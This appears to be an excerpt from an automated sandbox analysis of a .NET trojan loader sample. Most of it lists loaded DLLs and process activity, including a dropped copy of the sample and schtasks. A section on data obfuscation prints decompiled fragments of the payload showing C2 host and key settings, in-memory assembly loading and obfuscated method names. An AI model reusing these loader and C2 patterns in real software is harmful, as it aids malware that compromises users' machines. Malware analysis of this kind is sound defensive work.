Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Login.cs | .Net Code: InitializeComponent
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs | .Net Code: Memory
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs | .Net Code: Memory
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.cs | .Net Code: WQUYEM92kf System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Code function: 0_2_056AB057 push 00000005h; retf 0_2_056AB0B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Code function: 0_2_056AB0F7 push 00000005h; retf 0_2_056AB0B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Code function: 0_2_0708D41E push esp; iretd 0_2_0708D421
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Code function: 0_2_070861B8 pushfd ; retf 0_2_070861BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Code function: 0_2_071D87A8 push esp; retf 0_2_071D87A9
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Code function: 10_2_0758D41E push esp; iretd 10_2_0758D421
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Code function: 10_2_075861B8 pushfd ; retf 10_2_075861BC
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Code function: 10_2_07827F3B pushfd ; ret 10_2_07827F41
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Code function: 10_2_07827EF3 push esp; ret 10_2_07827EF9
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Code function: 10_2_078242D9 push ebx; ret 10_2_078242DA
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Code function: 10_2_07829003 push esp; iretd 10_2_07829009
Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe | Code function: 10_2_0782906B pushfd ; iretd 10_2_07829071
Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Static PE information: section name: .text entropy: 7.717538065664358
Source: xNgpESfQOvfb.exe.0.dr | Static PE information: section name: .text entropy: 7.717538065664358
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | High entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, NkEtj4xdihRGcDPjVY.cs | High entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | High entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, NkEtj4xdihRGcDPjVY.cs | High entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, JI4vkvhZNFR6VPxsSYH.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eIlLMT42tu', 'cpeLxkCWHZ', 'tv4LK99ryr', 'uxoLRD4PcS', 'YjELoReim3', 'ucuLXtbw1h', 'FD9L0pYyGp'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, Mp9dr9heXowoDfUBc7f.cs | High entropy of concatenated method names: 'juQPub4LRd', 'VkcP2hsoBx', 'H4BPEOPojm', 'KxBPldmP3G', 'tkUPbkhfJU', 'xh4Pj2yG79', 'zOBPFNtjG6', 'nlfPHxW0gw', 'jYvPT7D66L', 'vQxPNg5Va1'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, b8OPa0ptDmNZRs8a1D.cs | High entropy of concatenated method names: 'yMBQuZx1tN', 'c0nQ2gq3Ti', 'bpyQEhSPSi', 'LIIQlRLJWf', 'YIQQbb7ly2', 'V5AQjkTChY', 'FkRQFfSYrk', 'tlHQHCv4v6', 'DJqQTqJOwS', 'nFAQNGM3b3'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, coAw41HW9K74cRgqAt.cs | High entropy of concatenated method names: 'xCadMtcqxQ', 's8qdxD7g1u', 'RaAdKMstbX', 'pIsdR6b2NG', 'orFdo8AuaI', 'cYddX5M88T', 'i8Jd0MwTgE', 'Hsod66jcdN', 'YwbdasWrn9', 'F46dv83Xbf'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, jfuRhmRFSFcbJIi4WP.cs | High entropy of concatenated method names: 'VhT9ieQqr3', 'CqM9DZKmvA', 'ToString', 'COQ9rguSSI', 'mUS9dINkow', 'ggE9y7PtBy', 'Kj99nUbt4a', 's5e9wyNOE6', 's3B9QH2QYT', 'f8Y9WLFfUy'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, SjnStH1RyS9c3mH92a.cs | High entropy of concatenated method names: 'yLFMOA8WAAlNiD9amjl', 'Hy14R789odQie6v2opT', 'Uhdw5SXmBk', 'oWnwPMcY5A', 'gmUwLLnBPO', 'NZ5G3E8Y9D6ZK17Nng2', 'CUdHLE8Cn9xMvRwuE1M'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, mh2l126nvXkJPqinWr.cs | High entropy of concatenated method names: 'x7a5rKFIRk', 'C3A5dPgPdM', 'GkX5yF7S3j', 'yEt5nm6DkN', 'WaE5w7F9Cw', 'Yfk5QB6gFl', 'quZ5Wu7I0v', 'DmO5Jb19Ah', 'beL5iK8Wsp', 'jf05DxnnIp'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, pvhWxLsdO1DVJwN9jq.cs | High entropy of concatenated method names: 'XWmEmQX6M', 'v4YlVYaPb', 'BeXjDed6V', 'sEOF8dalU', 'b6wTRh61a', 'w3cNyomnx', 'mrhFRP01KAgA2yUNhb', 'HRewZLKZvRAueRXW5q', 'mRr591eEl', 'jZxLJy2Bf'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, WjkYcFaADDIrVYCSaV.cs | High entropy of concatenated method names: 'RPn5moSJ3U', 'cjU51dDQC8', 'OOX5ty6d4N', 'bDq5GqWTMH', 'Rle5MDxjJo', 'va358bWPO1', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, SWahZnhhsOyUNFiqsqU.cs | High entropy of concatenated method names: 'ToString', 'x8ALZjZ2pQ', 'IsgLYLe3sw', 'Qg2LC7koos', 'oWpLrUHxhm', 'MkqLdDfbBN', 'k5GLyNT9Ai', 'vlBLn5CdTh', 'STXP7Dt0PuWZR7YIp1H', 'GJDo6utKWpfA1JDfWbP'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, GhCMeWYfcmcjoFgkhc.cs | High entropy of concatenated method names: 'hbshQoAw41', 'k9KhW74cRg', 'G74hiIHXde', 'ODAhDyuWaw', 'uKjhSBE6an', 'Wn1hfuaoM5', 'uBDnG9iGbOJqaJM3dT', 'G6YU2ywaqS39KNaKJZ', 'hu40pVTRMNbwmGEEf4', 'YePhhkRXxK'
